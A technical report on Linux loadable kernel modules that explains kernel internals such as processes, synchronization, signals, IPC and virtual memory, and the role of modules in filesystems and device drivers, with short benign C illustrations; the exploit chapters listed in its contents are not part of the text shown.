A Report on Kernel Loadable Module


By

Koushik Ghosh.


    Table of Contents


    Chapter 1: Introduction

    1.1 Main Objective of The Work
    1.2 Previous work in This Field
    1.3 Unlike The previous Projects
    1.4 Expected Results
    1.5 Assumption And Environments

    Chapter 2: General Overview

    2.1 Overview of Kernel
    2.2 Introduction to Unix Kernel
    2.3 Switching to Linux
    2.4 Kernel Loadable Module

    Chapter 3: Design of the System

    3.1 Different Modularize approach in System Design
    3.2 File System
    3.3 Device Drivers
    3.4 System Calls
    3.5 Finding Exploit of Kernel loadable Module

    Chapter 4: System Implementations

    4.1 Kernel Loadable Module in System Enhancement
    4.1.1 File System Implementations
    4.1.2 Device Drivers
    4.1.3 New Systemcalls
    4.2 Kernel Module in Exploit
    4.2.1 Developing Exploits
    4.2.2 Linux Security Module Projects

    Chapter 5: Conclusion

    5.1 Advance Compatibilities
    5.2 Considerations
    5.3 Guidance
    5.4 Difficulties
    5.5 Future Scope of Developments

Introduction
    The access control mechanisms of existing mainstream operating systems are inadequate to provide strong system security. Since general-purpose operating systems must satisfy a wide range of user requirements, any access control mechanism integrated into such a system must be capable of supporting many different access control models, yet the standard kernel lacks direct support for enhanced access control mechanisms. Linux, however, has long supported dynamically loadable kernel modules, primarily for device drivers but also for other components such as filesystems. Loadable kernel modules are therefore an essential way of extending such a system, and they give Linux extra flexibility compared with other desktop and server operating systems.


1.1 Main Objective of The Work
    It once took two or three hours to install a new device on a Unix or Linux-like system, because enabling the device required recompiling the kernel. That is now history, because modern kernels are developed with a modular approach.
    A modular kernel reduces the working set size and allows new modules to be added later. Consider which is the easier way to add a device driver for a newly bought hardware device: 1) copying a module file, or 2) patching the kernel, recompiling, and rebooting, which costs precious uptime. Option 1 is easier for both users and device manufacturers.
    A detailed study of kernel modules is therefore worthwhile: for any operating system, the loadable kernel module approach is a route to success, and Linux is a great example of this. Loadable kernel modules have helped Linux expand from desktop systems to enterprise servers. Besides these enhancements, they also raise security issues, such as exploits and viruses written as modules, which can lead to a system crash or compromise.
    These problems are easier to fight with sound knowledge of how modules work. My project explores the parts of kernel modules that are still little explored. In it I describe some ideas for developing utilities as well as some exploits of LKMs, and my goal is to explore the internals of kernel modules in order to protect our systems from this type of attack.


1.2 Previous work in This Field
    The Linux kernel is flexible enough to be switched between a statically linked and a dynamically linked configuration, because the source code is available. A user can compile a given component either as a module or directly into the kernel.
    In March 2001, the National Security Agency (NSA) gave a presentation about Security-Enhanced Linux (SELinux) at the 2.5 Linux Kernel Summit. SELinux is an implementation of flexible and fine-grained nondiscretionary access controls in the Linux kernel, originally implemented as its own particular kernel patch.
    At present, the SELinux module hook function implementations do nothing. Module operations are controlled by the security policy by limiting the use of the CAP_SYS_MODULE capability via the selinux_capable hook function. If finer-grained controls are later determined to be worthwhile (e.g. controls based on the actual name or content of the module), then additional access controls could be implemented in these hook functions.
    A number of developers worked together to create a framework of kernel hooks that would allow many security models to work as loadable kernel modules. The first portions of this LSM framework appeared in the 2.5.29 kernel release.
    Further kernel releases contained more portions of the LSM framework, and the entire patch is expected to be included in the 2.6.0 kernel release (which, incidentally, was released just a few days ago).


1.3 Unlike The previous Projects
    The LSM kernel patch provides a general kernel framework to support security modules. In particular the LSM framework is primarily focused on supporting access control modules, although future development is likely to address other security needs such as auditing. By itself, the framework does not provide any additional security; it merely provides the infrastructure to support security modules. The LSM kernel patch also moves most of the capabilities logic into an optional capabilities security module, with the system defaulting to a dummy security module that implements the traditional superuser logic.
    However, LSM is a new project that is still being updated continuously. Until it has fully proven its functionality, it is not advisable to deploy it on production systems. Moreover, securing a system with it may require installing a new kernel version, which is not only time-consuming but also quite difficult on enterprise servers.
    Because this report explains the basics of loadable kernel modules together with the relevant kernel internals, its ideas are easier to apply to older systems, and it also helps the reader understand the tricks used in kernel hacking. An administrator can then protect his or her system with older, conventional tools rather than a new, experimental one.


1.4 Expected Results
    This project provides a thorough explanation for kernel programmers. The documentation has a basic section as well as advanced concepts. During the project I spent more time exploring the exploit side of loadable kernel modules than developing device drivers, because device drivers are already well covered while the abuses of loadable kernel modules are not. The development of device drivers (both char and block drivers) nevertheless produced good results.
    New system calls also proved easy to add to an existing system, and I have left some scope to improve my new system call while keeping to the standard Linux approach.
    The exploit work was more hectic, because after many (though not all) of the implementations the system had to be rebooted. I implemented many exploits in various areas of hacking and obtained noteworthy results. This documentation presents a few prototypes of them, for educational purposes only.


1.5 Assumption And Environments
    The whole documentation is based on Linux 2.0.x, Linux 2.2.x and Linux 2.4.x machines (x86). Most programs and code fragments were tested on a Linux system (RedHat 7.1).
    The Linux system must have LKM support to use most code examples in this documentation. Most ideas in this text will work on 2.2.x as well as 2.4.x systems (perhaps with minor modifications). As far as the kernel is concerned, it is recommended to use the even-numbered kernel series (i.e. 2.2.x and 2.4.x) because they are the stable ones.
    These programs and this documentation do not depend on the distribution (Redhat, SuSE, Caldera, ...) as long as the kernel version is unchanged. The documentation covers versions 2.0 through 2.4 of the kernel. All their features were taken into account during coding, but small incompatibilities may still arise that require minor modifications.



General Overview

2.1 Overview of Kernel

    The core of the operating system is called the kernel. It provides the main features as well as the basic functionality of the operating system.
    Microkernel operating systems demand a very small set of functions from the kernel, generally including a few synchronization primitives, a simple scheduler and an interprocess communication mechanism.
    Other system processes run on top of the microkernel and implement other OS-layer functions such as memory allocators, device drivers and system call handlers.
    In a monolithic kernel, each kernel layer is integrated into the whole kernel program and runs in kernel mode on behalf of the current process.
    Microkernels are generally slower than monolithic kernels, since the explicit message passing between the different layers of the OS has a cost.
    Microkernels do, however, have some theoretical advantages. They encourage a modular approach, since each OS layer is independent, and they tend to make better use of RAM than monolithic kernels. If the monolithic kernel is the reigning champion, the microkernel is the up-and-coming challenger.

    The microkernel is more flexible because it does almost nothing itself. It basically provides just four minimal services:

    (i) interprocess communication mechanism,
    (ii) some memory management,
    (iii) limited amount of low-level process management and scheduling and
    (iv) low-level input/output.


    Unlike the monolithic kernel, it does not provide the file system, directory system, full process management, or much system call handling. The services that the microkernel does provide are included because they are difficult or expensive to provide anywhere else. The goal is to keep it small.


2.2 Introduction to Unix Kernel

    The Unix kernel is an example of a monolithic kernel. It is large, complex, and quite conventional. Each kernel layer is integrated into the whole kernel program and runs in kernel mode on behalf of the current process. A traditional Unix kernel is compiled and statically linked.

    A CPU can run either in user mode or in kernel mode. Some CPUs have more than two execution modes; Intel CPUs, for example, have four different execution states. A standard Unix kernel, however, uses only kernel mode and user mode.



    Modern Unix Operating Systems have the following components


    § Virtual Memory
    § Virtual File Systems
    § Light Weight Process
    § Reliable Signals
    § System V Release 4 -Inter Process Communication
    § Symmetric Multiprocessing


    NB: Among the Unix variants, only the SVR4.2 kernel has a modularized feature.


    All Unix kernels are reentrant. This means that several processes may be executing in kernel mode at the same time. Of course, on a uniprocessor system only one process can progress, but many of them can be blocked in kernel mode, waiting for the CPU or for the completion of some I/O operation.

    One way to provide reentrancy is to write functions so that they modify only local variables and do not alter global data structures. Such functions are called reentrant functions.
    The kernel includes not only reentrant functions but also non-reentrant ones. It uses locking mechanisms to ensure that only one process can execute a non-reentrant function at a time.
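
    The difference between the two kinds of function can be sketched in ordinary user-space C. This is only an illustration, not kernel code; the function names sum_reentrant and sum_non_reentrant are hypothetical.

```c
#include <stddef.h>

/* Non-reentrant: the running total lives in a static (global) variable,
 * so two interleaved callers would overwrite each other's partial sums. */
static long shared_total;

long sum_non_reentrant(const int *values, size_t n)
{
    shared_total = 0;
    for (size_t i = 0; i < n; i++)
        shared_total += values[i];
    return shared_total;
}

/* Reentrant: only the parameters and local variables are touched, so any
 * number of control paths can execute it at the same time. */
long sum_reentrant(const int *values, size_t n)
{
    long total = 0;
    for (size_t i = 0; i < n; i++)
        total += values[i];
    return total;
}
```

    Called from a single control path both functions return the same result; only the second stays correct when calls are interleaved, which is why the first would need a lock around it.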


    Kernel control path

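    A kernel control path is the sequence of instructions the kernel executes to handle a system call, an exception, or an interrupt. For example, a process executing in user mode invokes a system call, and the corresponding kernel control path verifies that the request cannot be satisfied immediately; it then invokes the scheduler so that another process can run.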

    Process Address Space


    Each process runs in its private address space. A process running in user mode refers to private stack, data and code areas. When running in kernel mode, the process addresses the kernel data and code areas and uses another stack.

    Since the kernel is reentrant, several kernel control paths, each related to a different process, may be executed in turn, and each refers to its own private kernel stack. Although it appears to each process that it has a private address space, parts of the address space are sometimes shared among processes.


    · Processes can also share parts of their address space as a kind of interprocess communication, using the "shared memory" technique supported in Linux.


    Process Implementation

    The kernel manages processes; each process is represented by a process descriptor that records the current state of the process, including:

    · The program counter (PC) and stack pointer (SP) registers.
    · The general-purpose registers.
    · The floating point registers.
    · The processor control registers (processor status word), containing information about the CPU state.
    · The memory management registers, used to keep track of the RAM accessed by the process.

    Process

    The Unix kernel makes a neat distinction between a process and the program it is executing. The fork() and exit() system calls are used to create a new process and to terminate it, respectively, while an exec()-like system call loads a new program, giving the process a brand new address space containing it.
    A naive implementation of fork() would require both the parent's data and the parent's code to be duplicated and the copies assigned to the child, which would be quite time-consuming. That is why the Linux kernel relies on hardware paging units and on the Copy-On-Write approach, which defers copying a page until the parent or the child actually writes to it.
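
    The visible effect of this separation can be sketched from user space. The example below is a minimal illustration and assumes a POSIX system; the function name parent_value_after_child_write is hypothetical. It shows only that a write in the child does not reach the parent; the page copying itself happens inside the kernel and cannot be observed directly here.

```c
#define _POSIX_C_SOURCE 200809L
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns the parent's copy of `value` after the child has modified its
 * own copy, or -1 on error. */
int parent_value_after_child_write(void)
{
    int value = 42;
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        value = 99;                 /* the write affects the child's copy only */
        _exit(value == 99 ? 0 : 1);
    }
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return value;                   /* the parent still sees its own 42 */
}
```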


    Zombie Process

    The wait() system call allows a process to wait until one of its children terminates; it returns the process ID (PID) of the terminated child. When executing this system call, the kernel checks whether a child has already terminated. A special zombie process state is introduced to represent terminated processes: a process remains in that state until its parent executes a wait() system call on it.
    A special system process called init is created during system initialization. When a process terminates, the kernel changes the appropriate process descriptor pointers of all the existing children of the terminated process to make them children of init. The init process routinely issues wait() system calls, whose side effect is to get rid of all zombies.
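
    How a parent collects a terminated child can be sketched as follows. This is a user-space illustration assuming a POSIX system; the name reap_child_exit_code is hypothetical, and waitpid() is used instead of plain wait() so that only the child created here is collected.

```c
#define _POSIX_C_SOURCE 200809L
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Forks a child that exits immediately with `code`, then reaps it.
 * Between the child's exit and the waitpid() call the child is a zombie.
 * Returns the exit code seen by the parent, or -1 on error. */
int reap_child_exit_code(int code)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(code);                        /* child terminates at once */

    if (waitpid(pid, &status, 0) != pid)    /* removes the zombie entry */
        return -1;
    if (!WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

    If the parent never called waitpid(), the child would stay in the zombie state until the parent itself terminated and init inherited and reaped it.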


    Process groups and login sessions



    Each process descriptor includes a process group ID field. Each group of processes may have a group leader, which is the process whose PID coincides with the process group ID. A newly created process is initially inserted into the process group of its parent. Modern Unix kernels also introduce login sessions. A login session contains all processes that are descendants of the process that started a working session on a specific terminal. A login session may have several process groups active simultaneously; one of these process groups is always in the foreground, which means that it has access to the terminal. When a background process tries to access the terminal, it receives a SIGTTIN or SIGTTOU signal.
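
    The inheritance of the process group, and the way a process becomes a group leader, can be checked from user space. The sketch below assumes a POSIX system; both function names are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Waits for `pid` and returns 1 if it exited with status 0, 0 if it exited
 * with another status, -1 on error. */
static int child_succeeded(pid_t pid)
{
    int status;

    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status) == 0;
}

/* 1 if a newly forked child starts in its parent's process group. */
int child_inherits_process_group(void)
{
    pid_t parent_group = getpgrp();
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(getpgrp() == parent_group ? 0 : 1);
    return child_succeeded(pid);
}

/* 1 if a child can start its own group, of which it is then the leader
 * (process group ID equal to its own PID). */
int child_becomes_group_leader(void)
{
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setpgid(0, 0) != 0)
            _exit(1);
        _exit(getpgrp() == getpid() ? 0 : 1);
    }
    return child_succeeded(pid);
}
```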

    Synchronization and Critical Regions

    A reentrant kernel requires synchronization: if a kernel control path is suspended while acting on a kernel data structure, no other kernel control path is allowed to act on the same data structure unless it has been reset to a consistent state. When the outcome of some computation depends on how two or more processes are scheduled, the code is incorrect. This condition is called a race condition.
    In general, safe access to a global variable is ensured by using atomic operations.
    Any section of code that must be finished by each process that begins it before another process can enter it is called a critical region.
    Several Synchronization Techniques


    Non preemptive kernel

    Most traditional Unix kernels are non-preemptive: when a process executes in kernel mode, it cannot be arbitrarily suspended and substituted with another process.
    On a uniprocessor system, all kernel data structures that are not updated by interrupt or exception handlers are therefore safe for the kernel to access. This approach is not effective on multiprocessor systems, since two kernel control paths running on different CPUs could concurrently access the same data structure.
    Semaphore

    Semaphores are a widely used mechanism, effective on both uniprocessor and multiprocessor systems. A semaphore is simply a counter associated with a data structure; it is checked by all kernel threads before they try to access the data structure.
    A semaphore consists of an integer variable, a list of waiting processes, and two atomic methods: down() and up().
    When a kernel control path wishes to access the data structure, it executes the down() method on the proper semaphore, which decrements its value. If the new value of the semaphore is not negative, access to the data structure is granted; otherwise the process is added to the semaphore's waiting list and blocked. When another process executes the up() method on that semaphore, one of the processes in the waiting list is allowed to proceed.
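
    The bookkeeping behind down() and up() can be modelled in a few lines of C. The sketch below is a single-threaded model of the counter and the waiting list only; it does not block anything and is not the kernel's implementation. All names (semaphore_model, sem_model_down and so on) are hypothetical, and the fixed-size queue assumes that no more than MAX_WAITERS processes wait at once.

```c
#include <stddef.h>

#define MAX_WAITERS 8

struct semaphore_model {
    int count;                  /* >= 0: free slots; < 0: -count waiters */
    int waiters[MAX_WAITERS];   /* FIFO queue of waiting process IDs */
    size_t head, tail;
};

void sem_model_init(struct semaphore_model *s, int initial)
{
    s->count = initial;
    s->head = s->tail = 0;
}

/* Returns 1 if access is granted, 0 if `pid` was put on the waiting list. */
int sem_model_down(struct semaphore_model *s, int pid)
{
    s->count--;
    if (s->count >= 0)
        return 1;
    s->waiters[s->tail % MAX_WAITERS] = pid;
    s->tail++;
    return 0;
}

/* Returns the ID of the process allowed to proceed, or -1 if none waited. */
int sem_model_up(struct semaphore_model *s)
{
    int pid;

    s->count++;
    if (s->count > 0)
        return -1;              /* nobody was waiting */
    pid = s->waiters[s->head % MAX_WAITERS];
    s->head++;
    return pid;
}
```

    With an initial value of 1 the model behaves like a mutual exclusion lock: the first down() is granted, later callers queue up, and each up() releases the waiters in arrival order.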

    Spin Lock

    On multiprocessor systems, semaphores are not always the best solution to synchronization problems. Some kernel data structures must be protected from concurrent access by kernel control paths that run on different CPUs.
    In these cases, multiprocessor systems use spin locks. A spin lock is similar to a semaphore but has no list of waiting processes. When a process finds the lock closed by another process, it "spins" around repeatedly, executing a tight loop until the lock becomes open.
    Spin locks are useless on uniprocessor systems. When a kernel control path tries to access a locked data structure, it starts an endless loop, so the kernel control path that is updating the protected data never gets a chance to finish and release the lock, and the system hangs.
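
    A spin lock of this kind can be sketched with the atomic test-and-set operation of C11. This is a user-space model built on <stdatomic.h>, not the kernel's own spin lock code, and the names spinlock_model, spin_lock_model and so on are hypothetical.

```c
#include <stdatomic.h>

typedef struct {
    atomic_flag locked;         /* set while some control path holds the lock */
} spinlock_model;

#define SPINLOCK_MODEL_INIT { ATOMIC_FLAG_INIT }

/* Tries once; returns 1 if the lock was taken, 0 if it was already closed. */
int spin_trylock_model(spinlock_model *l)
{
    return !atomic_flag_test_and_set_explicit(&l->locked, memory_order_acquire);
}

/* Spins in a tight loop until the lock becomes open. There is no waiting
 * list: the caller simply keeps retrying the atomic test-and-set. */
void spin_lock_model(spinlock_model *l)
{
    while (atomic_flag_test_and_set_explicit(&l->locked, memory_order_acquire))
        ;                       /* busy-wait */
}

void spin_unlock_model(spinlock_model *l)
{
    atomic_flag_clear_explicit(&l->locked, memory_order_release);
}
```

    The loop in spin_lock_model() also shows why the technique fails on a single CPU: if the holder cannot run while the waiter spins, the loop never ends.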

    Deadlocks

    Kernel control paths that synchronize with other control paths may easily enter a deadlocked state. The Linux kernel avoids this problem by introducing only a small number of semaphore types and by requesting semaphores in ascending order.
    Interrupt disabling

    Another synchronization mechanism for uniprocessor systems consists of disabling all hardware interrupts before entering a critical region and re-enabling them right after leaving it.
    If the critical region is large, interrupts can remain disabled for a relatively long time, potentially causing all hardware activities to freeze. On a multiprocessor system the technique does not work at all, since there is no way to ensure that no other CPU can access the data structures updated in the protected critical region.
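
    Hardware interrupts cannot be disabled from user space, but the same pattern can be illustrated by analogy with signals: a process blocks a signal before a critical region and unblocks it afterwards, and a signal that arrives in between is held back until the region is left. The sketch below is only that analogy, assuming a POSIX system; the function name is hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stddef.h>
#include <string.h>

static volatile sig_atomic_t delivered;

static void on_usr1(int signo)
{
    (void)signo;
    delivered = 1;
}

/* Returns 1 if SIGUSR1 was held back inside the critical region and
 * delivered right after it, 0 otherwise, -1 on error. */
int signal_deferred_during_critical_region(void)
{
    struct sigaction sa;
    sigset_t block, previous;
    int seen_inside;

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_usr1;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGUSR1, &sa, NULL) != 0)
        return -1;

    sigemptyset(&block);
    sigaddset(&block, SIGUSR1);
    delivered = 0;
    if (sigprocmask(SIG_BLOCK, &block, &previous) != 0)   /* "disable" */
        return -1;

    raise(SIGUSR1);             /* arrives now but stays pending */
    seen_inside = delivered;    /* critical region: handler has not run */

    if (sigprocmask(SIG_SETMASK, &previous, NULL) != 0)   /* "re-enable" */
        return -1;
    return seen_inside == 0 && delivered == 1;
}
```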
    Signals and Interprocess Communication


    Unix signals provide a mechanism for notifying processes of system events. Each event has its own signal number.

    · Asynchronous notifications: for example, a user can send the interrupt signal SIGINT to a foreground process by pressing CTRL+C at the terminal.
    · Synchronous errors or exceptions: for example, the kernel sends SIGSEGV to a process when it accesses a memory location at an illegal address.


    A process may react to the reception of a signal in two ways:

    · Ignore the signal.
    · Asynchronously execute a specified procedure (signal handler).
    If the process does not specify one of these alternatives, the kernel performs a default action that depends on the signal number:

    · Terminate the process.
    · Write the execution context and the contents of the address space to a file (core dump) and terminate the process.
    · Ignore the signal.
    · Suspend the process.
    · Resume the process's execution if it is stopped.


    A few signals, e.g. SIGKILL, can be neither handled directly by the process nor ignored.
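
    Both points, installing a handler and the special status of SIGKILL, can be sketched with the POSIX sigaction() call. This is a user-space illustration; the function names catch_signal and can_install_handler are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stddef.h>
#include <string.h>

static volatile sig_atomic_t last_signal;

static void record_signal(int signo)
{
    last_signal = signo;        /* the handler runs asynchronously */
}

/* Installs a handler for `signo`, sends the signal to the calling process
 * and returns 1 if the handler ran, 0 if not, -1 on error. */
int catch_signal(int signo)
{
    struct sigaction sa;

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = record_signal;
    sigemptyset(&sa.sa_mask);
    if (sigaction(signo, &sa, NULL) != 0)
        return -1;

    last_signal = 0;
    if (raise(signo) != 0)
        return -1;
    return last_signal == signo;
}

/* Returns 1 if a handler may be installed for `signo`, 0 if the kernel
 * refuses. A successful change is undone again before returning. */
int can_install_handler(int signo)
{
    struct sigaction sa, old;

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = record_signal;
    sigemptyset(&sa.sa_mask);
    if (sigaction(signo, &sa, &old) != 0)
        return 0;
    sigaction(signo, &old, NULL);
    return 1;
}
```

    Calling can_install_handler(SIGKILL) returns 0, because the kernel rejects any attempt to change the action for that signal.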
    AT&T's Unix System V introduced other kinds of IPC among processes in user mode, which have been adopted by many Unix kernels: semaphores, message queues, and shared memory. They are collectively known as System V IPC.


    A process acquires an IPC resource by invoking the shmget(), semget() or msgget() system call. Messages are exchanged with the msgsnd() and msgrcv() system calls, which respectively insert a message into a specific message queue and extract a message from it. Shared memory provides the fastest way for processes to exchange and share data. A process issues the shmget() system call to create a new shared memory region of the required size, the shmat() system call to obtain the starting address of the new region within its address space, and the shmdt() system call to detach the shared memory from its address space.
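
    The shared memory calls can be put together in a short sketch. It assumes a system with System V IPC enabled; the function name share_int_with_child is hypothetical, and the shmctl() call with IPC_RMID is added here only to remove the region again after use.

```c
#define _XOPEN_SOURCE 700
#include <stddef.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <unistd.h>

/* Creates a shared region, lets a child process write `value` into it and
 * returns what the parent then reads from the region, or -1 on error. */
int share_int_with_child(int value)
{
    int result = -1;
    int *shared;
    pid_t pid;
    int id = shmget(IPC_PRIVATE, sizeof(int), IPC_CREAT | 0600);

    if (id < 0)
        return -1;
    shared = shmat(id, NULL, 0);            /* map the region */
    if (shared == (void *)-1) {
        shmctl(id, IPC_RMID, NULL);
        return -1;
    }
    *shared = 0;

    pid = fork();                           /* the child inherits the mapping */
    if (pid == 0) {
        *shared = value;
        shmdt(shared);
        _exit(0);
    }
    if (pid > 0 && waitpid(pid, NULL, 0) == pid)
        result = *shared;                   /* the child's write is visible */

    shmdt(shared);                          /* detach from our address space */
    shmctl(id, IPC_RMID, NULL);             /* destroy the region */
    return result;
}
```

    Unlike an ordinary variable, which fork() gives the child a private copy of, the attached region is the same memory in both processes.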

    Memory Management

    Memory management is the most complex activity in a Unix Kernel.

    Virtual Memory: All recent Unix systems provide a useful abstraction called virtual memory. It acts as a logical layer between the application memory requests and the hardware Memory Management Unit (MMU).

    Advantages

    1. Several processes can be executed concurrently.
    2. It is possible to run applications whose memory needs are larger than the available physical memory.
    3. Processes can execute a program whose code is only partially loaded in memory.
    4. Each process is allowed to access a subset of the available physical memory.
    5. Processes can share a single memory image of a library or program.
    6. Programs can be relocatable, that is, they can be placed anywhere in physical memory.
    7. Programmers can write machine-independent code, since they do not need to be concerned about physical memory organization.

    When a process uses a virtual address, the kernel and the MMU cooperate to locate the actual physical location of the requested memory items.
    Today's CPUs include hardware circuits that automatically translate virtual addresses into physical ones. The available RAM is partitioned into page frames, typically 4 or 8 kB in length, and a set of page tables is introduced to specify the correspondence between virtual and physical addresses.
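
    The arithmetic of this translation can be sketched for 4 kB pages. The example below models a single-level page table as a plain array, which is a simplification of what real hardware does; all names (translate, TOY_PAGE_SHIFT and so on) are hypothetical.

```c
#include <stdint.h>

#define TOY_PAGE_SHIFT  12u                     /* 4 kB pages: 2^12 bytes */
#define TOY_PAGE_SIZE   (1u << TOY_PAGE_SHIFT)
#define TOY_NUM_PAGES   4u                      /* size of the toy page table */
#define TOY_NOT_PRESENT UINT32_MAX              /* marks an unmapped page */

/* page_table[virtual page number] holds the page frame number.
 * Returns the physical address, or TOY_NOT_PRESENT if the page is not
 * mapped (the case in which real hardware raises a page fault). */
uint32_t translate(const uint32_t *page_table, uint32_t vaddr)
{
    uint32_t page   = vaddr >> TOY_PAGE_SHIFT;       /* upper bits */
    uint32_t offset = vaddr & (TOY_PAGE_SIZE - 1);   /* lower 12 bits */

    if (page >= TOY_NUM_PAGES || page_table[page] == TOY_NOT_PRESENT)
        return TOY_NOT_PRESENT;
    return (page_table[page] << TOY_PAGE_SHIFT) | offset;
}
```

    For example, with virtual page 0 mapped to frame 5, the virtual address 0x0123 translates to the physical address 0x5123: the offset within the page is kept and only the page number is replaced.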


2.3 Switching to Linux

    1. Multiprocessor Support.
    2. Kernel Threading.
    3. Multithread Application Support.
    4. Non preemptive Kernel.
    5. Dynamic linking Support.


    1. Multiprocessor Support: Linux kernels take advantage of multiprocessor hardware. Since the 2.2.x releases, Linux supports SMP (symmetric multiprocessing), which means not only that the system can use multiple processors but also that any processor can handle any task; there is no discrimination among them.

    2. Kernel Threading: Context switches between kernel threads are usually much less expensive than context switches between ordinary processes, since kernel threads usually operate in a common address space.

    3. Multithreaded Application Support: A multithreaded user application is a set of lightweight processes (LWPs), that is, processes that can operate on a common address space, common physical memory pages, common open files and so on.

    4. Non-preemptive Kernel: Like most traditional Unix kernels, the Linux kernel is non-preemptive: when a process executes in kernel mode, it cannot be arbitrarily suspended and substituted with another process. This means that Linux cannot arbitrarily interleave execution flows while they are in privileged mode, so several sections of kernel code can assume that they run without being preempted.

    5. Dynamic Linking Support: The Linux kernel supports dynamic linking: we can load and unload some parts of the kernel code, which are called modules. A module is an object file whose code can be linked to and unlinked from the kernel at runtime.

    The object code usually consists of a set of functions that implement a file system, a device driver, or other features at the kernel's upper layer. A module does not run as a specific process. Instead, it is executed in kernel mode on behalf of the current process, like any other statically linked kernel function.



2.4 Kernel Loadable Module

    Modules are a kernel feature that effectively achieves many of the theoretical advantages of microkernels without introducing performance penalties. A module is an object file whose code can be linked to (and unlinked from) the kernel at runtime. The object code usually consists of a set of functions that implement a file system, a device driver, or other features at the kernel's upper layer. A module does not run as a specific process. Instead, it is executed in kernel mode on behalf of the current process, like any other statically linked kernel function.

    Kernel Loadable Module approach ( in GNU/Linux)

    Loadable kernel modules are used in GNU/Linux systems: they are object files of a particular type that can be linked into Linux at runtime to extend its functionality. Because they are loaded dynamically, installing or linking one requires neither recompiling the kernel nor rebooting the system before the loadable kernel module (LKM) can be used.

    Terminology

    Kernel Loadable Modules are often called just kernel modules or just modules, but those are rather misleading terms because there are lots of kinds of modules in the world and various pieces built into the base kernel can easily be called modules. We use the term loadable kernel module or LKM for the particular kinds of modules.
    Some people think of LKMs as outside of the kernel. They speak of LKMs communicating with the kernel. This is a mistake; LKMs (when loaded) are very much part of the kernel. The correct term for the part of the kernel that is bound into the image that we boot, i.e. all of the kernel except the LKMs, is "base kernel." LKMs communicate with the base kernel. In some other operating systems, the equivalent of a Linux LKM is called a "kernel extension."

    History of Loadable Kernel Modules

    LKMs did not exist in Linux in the beginning. Anything we use an LKM for today was built into the base kernel at kernel build time instead. LKMs have been around at least since Linux 1.2 (1995).
    Device drivers and such were always quite modular. When LKMs were invented, only a small amount of work was needed on these modules to make them buildable as LKMs. However, it had to be done on each and every one, so it took some time. Since about 2000, virtually everything that makes sense as an LKM has at least had the option of being an LKM.

    Using the Kernel Modules

    We often have a choice between putting a module into the kernel by loading it as an LKM or binding it into the base kernel. LKMs have many advantages over binding into the base kernel and are generally the recommended choice.
    One advantage is that we don't have to rebuild our kernel as often. This saves time and spares us the possibility of introducing an error in rebuilding and reinstalling the base kernel. Once we have a working base kernel, it is good to leave it untouched as long as possible.
    Another advantage is that LKMs help us to diagnose system problems. A bug in a device driver which is bound into the kernel can stop the system from booting at all. And it can be really hard to tell which part of the base kernel caused the trouble. If the same device driver is an LKM, though, the base kernel is up and running before the device driver even gets loaded. If our system dies after the base kernel is up and running, it's an easy matter to track the problem down to the trouble-making device driver and just not load that device driver until we fix the problem.

    LKMs can save memory, because we need to have them loaded only when we are actually using them. All parts of the base kernel stay loaded all the time, and in real storage, not just virtual storage.
    LKMs are much faster to maintain and debug. What would require a full reboot to do with a file system driver built into the kernel, we can do with a few quick commands with LKMs. We can try out different parameters or even change the code repeatedly in rapid succession, without waiting for a boot.
    Sometimes we have to build something into the base kernel instead of making it a module. Anything that is necessary to get the system up far enough to load kernel modules must obviously be built into the base kernel. For example, the driver for the disk drive that contains the root file system must be built into the base kernel.


    There is a tendency to think of LKMs as user space programs. They do share many of their properties, but LKMs are definitely not user space programs; they are part of the kernel. As such, they have free run of the system and can easily crash it, and they can manipulate any system call in whatever way their author chooses. This makes kernel code one of the most effective means of attacking a Linux system, and a loadable kernel module is the easiest way of introducing it: an LKM makes it possible to run code in kernel space, which gives access to very sensitive parts of the OS.


Design of The System

    The design part of the project contains a thorough analysis of loadable kernel modules, i.e. their introduction to the system and their role in system enhancement. It also contains information about LKM exploits, which are nowadays used as system hacking tools; LKMs provide the theoretical basis for writing viruses on Linux systems. Both sides are discussed briefly here, together with the planning and design decisions by which I combined the two sides in one project to explore the world of loadable kernel modules.

    3.1 Different Modularize approach in System Design

    If we want to add code to the Linux kernel, the most basic way to do that is to add some source files to the kernel source tree and recompile the kernel. In fact, the kernel configuration process consists mainly of choosing which files to include in the kernel to be compiled. But we can also add code to the Linux kernel while it is running. A chunk of code that we add in this way is called a loadable kernel module. These modules can do lots of things, but they typically are one of three things:

    · File System Implementations
    · Device Drivers
    · New System calls

    The kernel isolates certain functions, including these, especially well so they don't have to be intricately wired into the rest of the kernel. These are the functions used in system enhancement (for example ipchains and iptables for firewalling, or the initialization of a new device such as the eepro100 network driver).

    3.2 Filesystem drivers in Modularized approach

    A file system driver interprets the contents of a file system (which is typically the contents of a disk drive) as files and directories and such. There are lots of different ways of storing files and directories and such on disk drives, on network servers, and in other ways. For each way, we need a filesystem driver. For example, there are filesystem drivers for the ext2 and ext3 filesystem types used almost universally on Linux disk drives. There is one for the MS-DOS filesystem too, and one for NFS. We can load them into the running Linux kernel through the LKM facility.

    3.3 Device drivers in Modularized approach

    A device driver is designed for a specific piece of hardware. The kernel uses it to communicate with that piece of hardware without having to know any details of how the hardware works. For example, there is a device driver for ATA disk drives. There is one for NE2000 compatible Ethernet cards. To use any device, the kernel must contain a device driver for it. Modules are also well suited to developing network drivers.
    A network driver interprets a network protocol. It feeds and consumes data streams at various layers of the kernel's networking function. For example, if we want an IPX link in our network, we would use the IPX driver.

